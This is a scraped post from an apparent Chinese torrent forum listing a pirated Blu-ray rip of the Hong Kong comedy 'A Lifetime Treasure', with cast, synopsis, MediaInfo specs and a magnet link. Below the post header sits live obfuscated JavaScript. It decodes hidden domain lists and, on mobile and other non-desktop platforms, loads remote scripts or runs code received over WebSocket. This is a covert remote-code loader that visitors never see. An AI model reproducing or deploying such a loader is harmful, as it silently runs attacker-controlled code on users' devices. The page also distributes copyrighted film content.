如珠如宝的人生[国粤语音轨/中文字幕].A.Lifetime.Treasure.2019.1080p.BluRay.x264.DTS.2Audio-迅雷下载 8.97GB

版主小s 18天前 193

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 如珠如宝的人生 / A Lifetime Treasure

◎片 名 如珠如寶

◎年 代 2019

◎产 地 中国香港

◎类 别 剧情 / 喜剧 / 动作

◎语 言 粤语

◎上映日期 2019-01-31(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt9635902/

◎豆瓣评分 4.8/10 (1150人评价)

◎豆瓣链接 https://movie.douban.com/subject/30335298/

◎片 长 95分钟

◎导 演 林敏骢 Man-Chung Lam (id:1289295)

麦启光 Albert Kai-kwong Mak (id:1349070)

◎编 剧 林敏骢 Man-Chung Lam (id:1289295)

魏达深 (id:1409522)

◎演 员 洪金宝 Sammo Hung Kam-Bo (id:1055887)

林敏骢 Man-Chung Lam (id:1289295)

张继聪 Louis Cheung (id:1316230)

王菀之 Ivana Wong (id:1315465)

林盛斌 Shing-Ban Lam (id:1351653)

恬妞 Niu Tien (id:1006142)

梁小龙 Siu-Lung Leung (id:1274267)

林雪 Suet Lam (id:1274279)

泰迪·罗宾 Teddy Robin (id:1274243)

吴耀汉 Richard Ng (id:1037408)

黄尧 Yao Huang (id:1378152)

邹文正 Terry Zou (id:1350958)

杜宇航 Yu-Hang To (id:1315999)

邵音音 Yin-Yin Shaw (id:1297367)

吴嘉龙 Carl Wu (id:1214684)

沈震轩 Sammy Sum (id:1316097)

李静仪 Heidi Lee (id:1343968)

庄思敏 Jacquelin Chong (id:1326932)

庄韵澄 Xenia Chong (id:1401116)

劳浩羽 Jeffery Lou (id:1405605)

顾定轩 Zeno Koo (id:1384688)

卢慧敏 Amy Lo (id:1377720)

刘芷希 Kimmy Low (id:1397895)

张启乐 Ben Cheung (id:1375544)

苏伟泉 Kumer So (id:1383872)

泰迪·罗宾 Teddy Robin (id:1274243)

胡心刚 (id:1409523)

侯莉 (id:1409524)

肖美慧 (id:1409525)

翁秀兰 Shirley Yung Sau-Lan (id:1355762)

◎标 签 喜剧 / 香港 / 香港电影 / 洪金宝 / 2019 / 张继聪 / 林敏聪 / 泰迪罗宾

◎简 介

30年前一宗金猪失窃未破案,本来是华探长中最好打的肥蟹(洪金寳饰)因太肥胖被革职,兼患上轻度脑退化,被从战场上回流的无分国界医生阮祥昌(院长)(林敏驄饰)连同其它捡回来的老人(吴耀汉、梁小龙、泰迪罗宾、恬妞)一起收留安置在祖传的安憩老人院中,并由院长昔日看护助手清清(王菀之饰)悉心照顾,安享晚年。院长小学同学,雨云集团创办人洪雨云(林雪饰)现今已是成功商人,因小时曾被院长欺负怀恨在心,誓要夺取院长的老人院,令院长一无所有,派出小职员阿俊(张继聪饰)、阿乐(林盛斌饰)前往混入捣乱。众老人各身怀绝技,亦非泛泛之辈,誓要保住老人院这个家,以报答院长救命之恩。《如珠如宝》的从来都是身边的家人,而家人,是一个也不能少的……

  1. General

  2. Unique ID : 263371105641529810617899187496554189981 (0xC6236E0CE310CAA2A77636E145D9D49D)

  3. Complete name : [email protected]DQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.97 GiB

  7. Duration : 1 h 34 min

  8. Overall bit rate : 13.6 Mb/s

  9. Movie name : A Lifetime Treasure 2019

  10. Encoded date : UTC 2021-07-12 14:32:09

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 34 min

  25. Bit rate : 10.5 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.284

  36. Stream size : 6.95 GiB (77%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.85 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 34 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 510 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 1 021 MiB (11%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 34 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 510 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 24 bits

  73. Compression mode : Lossy

  74. Stream size : 1 021 MiB (11%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 33 min

  87. Bit rate : 38.7 kb/s

  88. Count of elements : 2482

  89. Stream size : 25.8 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 33 min

  103. Bit rate : 39.5 kb/s

  104. Count of elements : 2482

  105. Stream size : 26.3 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 33 min

  119. Bit rate : 43.5 kb/s

  120. Count of elements : 2495

  121. Stream size : 29.0 MiB (0%)

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : Chapter 01

  128. 00:07:01.958 : Chapter 02

  129. 00:14:44.000 : Chapter 03

  130. 00:23:20.875 : Chapter 04

  131. 00:30:54.666 : Chapter 05

  132. 00:39:44.291 : Chapter 06

  133. 00:46:43.500 : Chapter 07

  134. 00:54:53.458 : Chapter 08

  135. 01:02:15.416 : Chapter 09

  136. 01:09:50.750 : Chapter 10

  137. 01:17:47.958 : Chapter 11

  138. 01:27:24.083 : Chapter 12


TAGS 动作 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:2AABBE66DB8C8DD6BBDE1369FC9C2D42AEFAB92B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回